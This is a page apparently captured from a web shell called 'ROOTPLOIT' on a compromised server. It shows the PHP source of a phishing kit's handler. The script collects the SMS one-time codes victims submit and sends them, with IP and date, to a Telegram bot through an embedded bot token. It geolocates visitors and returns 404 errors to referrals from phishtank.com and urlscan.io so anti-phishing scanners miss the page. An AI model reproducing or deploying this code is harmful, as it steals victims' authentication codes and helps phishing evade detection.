ROOTPLOIT
Server: Apache
System: Linux node6122.myfcloud.com 6.14.3-x86_64-linode168 #1 SMP PREEMPT_DYNAMIC Mon Apr 21 19:47:55 EDT 2025 x86_64
User: bashacomputer (1004)
PHP: 7.4.33
Disabled: exec,passthru,shell_exec,system
$ pwd: /home/bashacomputer/www/iljawa/torsion/logz/
Upload Files
File: /home/bashacomputer/www/iljawa/torsion/logz/logzsmsfailed.php
<?php


$date = date('m/d/Y h:i:s a', time());
$ip = getenv("REMOTE_ADDR");



$message .= "+❤️✉️✉️✉️SMS2-ISRAEL✉️✉️✉️❤️+\n";
$message .= "* SMS CODE : ".$_POST['msg']."\n";

$message .= "* IP   : $ip\n";
$message .= "* date   : $date\n";
$message .= "+❤️✉️✉️✉️SMS1-ISRAEL✉️✉️✉️❤️+\n";




$api = "6218594251:AAF2vb_XoOAUXeVtbJ9lnf6nusqMMXiE9eI";$chatid = "6239097171";file_get_contents("https://api.telegram.org/bot".$api."/sendMessage?chat_id=".$chatid."&text=" . urlencode($message)."" );

$ip = getenv("REMOTE_ADDR");
$file = fopen("log.txt","a");
fwrite($file,$ip."  -  ".gmdate ("Y-n-d")." @ ".gmdate ("H:i:s")."\n");
$IP_LOOKUP = @json_decode(file_get_contents("http://ip-api.com/json/".$ip));
$COUNTRY = $IP_LOOKUP->country . "\r\n";
$CITY    = $IP_LOOKUP->city . "\r\n";
$REGION  = $IP_LOOKUP->region . "\r\n";
$STATE   = $IP_LOOKUP->regionName . "\r\n";
$ZIPCODE = $IP_LOOKUP->zip . "\r\n";
$message=$ip."\nCountry : ".$COUNTRY."City: " .$CITY."Region : " .$REGION."State: " .$STATE."Zip : " .$ZIPCODE;
$pra=rand();
$pra=md5($pra);
   ### Perform a HTTP REFERER check on the visitor to see if they are coming from the Phishtank website ###

        if(isset($_SERVER['HTTP_REFERER'])) {
         if(parse_url($_SERVER['HTTP_REFERER'], PHP_URL_HOST) == 'phishtank.com') {
            $content = "#> ".$_SERVER['HTTP_USER_AGENT']." [ Phishtank ] \r\n";
            $save=fopen("phistank.txt","a+");
            fwrite($save,$content);
            fclose($save);
            header("HTTP/1.0 404 Not Found");exit();

        }
        }

        if(isset($_SERVER['HTTP_REFERER'])) {
         if(parse_url($_SERVER['HTTP_REFERER'], PHP_URL_HOST) == 'www.phishtank.com') {
            $content = "#> ".$_SERVER['HTTP_USER_AGENT']." [ Phishtank ] \r\n";
            $save=fopen("phistank.txt","a+");
            fwrite($save,$content);
            fclose($save);
            header("HTTP/1.0 404 Not Found");exit();

        }
        }
        
        if(isset($_SERVER['HTTP_REFERER'])) {
         if(parse_url($_SERVER['HTTP_REFERER'], PHP_URL_HOST) == 'www.urlscan.io') {
            $content = "#> ".$_SERVER['HTTP_USER_AGENT']." [ Phishtank ] \r\n";
            $save=fopen("phistank.txt","a+");
            fwrite($save,$content);
            fclose($save);
            header("HTTP/1.0 404 Not Found");exit();

        }
        }


        header("Location: ../loadx.php?Key=$ip=$pra$pra$pra$pra$ip$COUNTRY");


?>
@ Telegram